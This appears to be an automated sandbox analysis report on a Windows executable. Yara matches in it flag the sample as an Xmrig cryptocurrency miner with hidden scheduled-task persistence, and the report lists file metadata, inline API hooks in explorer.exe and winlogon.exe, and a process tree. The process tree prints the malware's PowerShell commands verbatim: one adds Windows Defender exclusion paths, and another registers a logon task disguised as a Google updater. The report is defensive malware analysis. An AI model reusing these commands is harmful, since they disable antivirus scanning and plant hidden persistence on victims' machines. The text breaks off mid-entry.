                                              • Generic Win/DOS Executable (2004/3) 12.51%
                                              • DOS Executable Generic (2002/1) 12.50%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                              File name:h2qWqtD73F.exe
                                              File size:5'980'672 bytes
                                              MD5:d0c2dd0e059c5011ed2eee4c65122177
                                              SHA1:a992a12930f59a9bff9a49337c004fef02a9fa4e
                                              SHA256:9db1d611bba928f40d86374641783083cda4f613236f3ec21ce62bcdeee9a6e6
                                              SHA512:7b415d78ff03d7f700c58fbc14f98a426c968d47e8ef366ba845cff2148d646b996b0b94438d6152eeea801b3a8a8ec4806de73f5d8513943e6e1519a5c624a5
                                              SSDEEP:98304:J8uD4BG85s9oxVU3MNkQ5Tmzku2D5YOttCTt9EwB6TQP+zyLlvxInBwae5MKc:Jz4UMCWQku2VvIt2q6TVyLlJIBwaf
                                              TLSH:6056C0F077ED6AA0E07E9476CAE5B81304053E7DF334A6A9DC9BA9C522C47C98D5700E
                                              File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....>[................@..............................[......%\...`... ............................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x1400014b0
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x140000000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x66F2D90E [Tue Sep 24 15:21:50 2024 UTC]
                                              TLS Callbacks:0x4000f090, 0x1, 0x4000f060, 0x1
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f7505c167603909b7180406402fef19e
                                              Instruction
                                              dec eax
                                              sub esp, 28h
                                              dec eax
                                              mov eax, dword ptr [005AFD05h]
                                              mov dword ptr [eax], 00000001h
                                              call 00007FFB488410CFh
                                              nop
                                              nop
                                              dec eax
                                              add esp, 28h
                                              ret
                                              nop dword ptr [eax]
                                              dec eax
                                              sub esp, 28h
                                              dec eax
                                              mov eax, dword ptr [005AFCE5h]
                                              mov dword ptr [eax], 00000000h
                                              call 00007FFB488410AFh
                                              nop
                                              nop
                                              dec eax
                                              add esp, 28h
                                              ret
                                              nop dword ptr [eax]
                                              dec eax
                                              sub esp, 28h
                                              call 00007FFB48858214h
                                              dec eax
                                              test eax, eax
                                              sete al
                                              movzx eax, al
                                              neg eax
                                              dec eax
                                              add esp, 28h
                                              ret
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              dec eax
                                              lea ecx, dword ptr [00000009h]
                                              jmp 00007FFB488413E9h
                                              nop dword ptr [eax+00h]
                                              ret
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              nop
                                              dec eax
                                              lea eax, dword ptr [005B4869h]
                                              dec eax
                                              lea edx, dword ptr [eax+21h]
                                              mov byte ptr [eax], 00000000h
                                              dec eax
                                              add eax, 01h
                                              dec eax
                                              cmp eax, edx
                                              jne 00007FFB48841406h
                                              ret
                                              dec eax
                                              lea eax, dword ptr [005B4811h]
                                              dec eax
                                              lea edx, dword ptr [eax+18h]
                                              mov word ptr [eax], 0000h
                                              dec eax
                                              add eax, 02h
                                              dec eax
                                              cmp eax, edx
                                              jne 00007FFB48841404h
                                              ret
                                              dec eax
                                              lea eax, dword ptr [005B47D7h]
                                              dec eax
                                              lea edx, dword ptr [eax+14h]
                                              mov word ptr [eax], 0000h
                                              dec eax
                                              add eax, 02h
                                              dec eax
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5b70000xa34.idata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5ba0000x678.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5b20000x1170.pdata
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5bb0000x330.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x5b07c00x28.rdata
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x5b728c0x250.idata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x194a00x1960058cdd396d034b5e465bc759df59c7fe4False0.4725119304187192data6.169699076142243IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .data0x1b0000x592ce00x592e007dd1388e1f5e55284919058eb885f701unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rdata0x5ae0000x3a300x3c003a4566c8a121a0796d34a26d4a86c695False0.35475260416666665OpenPGP Secret Key5.050046376357435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .pdata0x5b20000x11700x1200e6eb6fb37253a7247e369d69bfa5ca4aFalse0.4672309027777778data5.115355474204768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .xdata0x5b40000xf080x10008af173377510fd9427c83121335321ecFalse0.241943359375data4.018304666666889IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .bss0x5b50000x1ca00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .idata0x5b70000xa340xc00bc194b5beaec5996a339d475fc5318c4False0.3030598958333333data3.813179986422126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .CRT0x5b80000x600x2003ad6371bc0079a85d9633ae66c2d882dFalse0.068359375data0.28655982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .tls0x5b90000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x5ba0000x6780x800417d4c396816418dc586e13d4963eb76False0.36767578125data4.090889627138075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .reloc0x5bb0000x3300x400eff4113c063707272b04f05956372dddFalse0.572265625data4.781501833134078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x5ba0a00x2b0dataEnglishUnited States0.4258720930232558
                                              RT_MANIFEST0x5ba3500x325XML 1.0 document, ASCII textEnglishUnited States0.506832298136646
                                              DLLImport
                                              KERNEL32.dllCloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                                              msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 8, 2024 00:24:46.792241096 CEST1.1.1.1192.168.2.110xe76No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              Oct 8, 2024 00:24:46.792241096 CEST1.1.1.1192.168.2.110xe76No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                              Code Manipulations

                                              Function NameHook TypeActive in Processes
                                              ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                              NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                              ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                              NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                              ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                              NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                              NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                              ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                              ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                              NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                              RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                              NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                              NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                              ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                              ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                              Function NameHook TypeNew Data
                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                              Function NameHook TypeNew Data
                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:18:24:28
                                              Start date:07/10/2024
                                              Path:C:\Users\user\Desktop\h2qWqtD73F.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\h2qWqtD73F.exe"
                                              Imagebase:0x7ff752a40000
                                              File size:5'980'672 bytes
                                              MD5 hash:D0C2DD0E059C5011ED2EEE4C65122177
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:18:24:29
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:18:24:29
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff68cce0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:18:24:32
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\dialer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\dialer.exe
                                              Imagebase:0x7ff78a700000
                                              File size:39'936 bytes
                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:6
                                              Start time:18:24:32
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:18:24:32
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff68cce0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:18:24:32
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\winlogon.exe
                                              Wow64 process (32bit):false
                                              Commandline:winlogon.exe
                                              Imagebase:0x7ff729c20000
                                              File size:906'240 bytes
                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:9
                                              Start time:18:24:33
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\lsass.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\lsass.exe
                                              Imagebase:0x7ff6745e0000
                                              File size:59'456 bytes
                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:10
                                              Start time:18:24:34
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:11
                                              Start time:18:24:34
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\dwm.exe
                                              Wow64 process (32bit):false
                                              Commandline:"dwm.exe"
                                              Imagebase:0x7ff613010000
                                              File size:94'720 bytes
                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:12
                                              Start time:18:24:38
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:13
                                              Start time:18:24:39
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:14
                                              Start time:18:24:39
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:15
                                              Start time:18:24:39
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:16
                                              Start time:18:24:39
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Target ID:17
                                              Start time:18:24:40
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:20
                                              Start time:18:24:40
                                              Start date:07/10/2024
                                              Path:C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                                              Imagebase:0x7ff6dd480000
                                              File size:5'980'672 bytes
                                              MD5 hash:D0C2DD0E059C5011ED2EEE4C65122177
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 55%, ReversingLabs
                                              Has exited:true

                                              Target ID:21
                                              Start time:18:24:40
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:22
                                              Start time:18:24:41
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:23
                                              Start time:18:24:41
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff68cce0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:24
                                              Start time:18:24:42
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:25
                                              Start time:18:24:43
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:26
                                              Start time:18:24:43
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\dialer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\dialer.exe
                                              Imagebase:0x7ff78a700000
                                              File size:39'936 bytes
                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:27
                                              Start time:18:24:43
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
                                              Imagebase:0x7ff6eb350000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:28
                                              Start time:18:24:43
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff68cce0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:29
                                              Start time:18:24:43
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:31
                                              Start time:18:24:44
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                              Imagebase:0x7ff68dea0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:32
                                              Start time:18:24:45
                                              Start date:07/10/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
